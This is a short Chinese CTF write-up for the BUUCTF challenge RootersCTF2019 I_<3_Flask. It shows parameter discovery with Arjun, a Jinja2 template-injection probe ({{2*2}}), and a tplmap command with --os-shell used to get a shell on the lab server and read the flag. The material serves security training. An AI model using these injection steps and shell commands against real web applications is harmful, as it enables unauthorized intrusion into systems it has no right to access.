BUUCTF [RootersCTF2019] I_<3_Flask

  • Post author:
  • Post category:其他


BUUCTF [RootersCTF2019] I_<3_Flask


考点:


  1. Jinjia2模版注入

  2. Arjun

    参数爆破工具

  3. tplmap

    模版注入工具

启动环境:

在这里插入图片描述

一道

Flask

题目,大概率为模版注入,先用

Arjun

工具对可利用传参进行爆破:

python3 arjun.py -u http://xxx.node3.buuoj.cn/  -m GET -c 200

得到参数名:

name


在这里插入图片描述

尝试传入值:

?name=1


在这里插入图片描述

页面发生了变化,传参被成功执行,尝试模版注入:

?name={{2*2}}

在这里插入图片描述

成功执行,存在模版注入漏洞,使用

tplmap

进行扫描:

python2 tplmap.py -u 'http://xxx.node3.buuoj.cn/?name=1'

在这里插入图片描述

得到返回结果:

Engine: Jinja2


判断为

Jinjia2模版注入

,使用

tplmap

继续

getshell

python2 tplmap.py -u 'http://943902f6-cd89-459c-b3d0-331243c9ad38.node3.buuoj.cn/?name=1' --os-shell

在这里插入图片描述

拿到shell,尝试查找flag:

在这里插入图片描述

得到flag



版权声明:本文为weixin_44037296原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。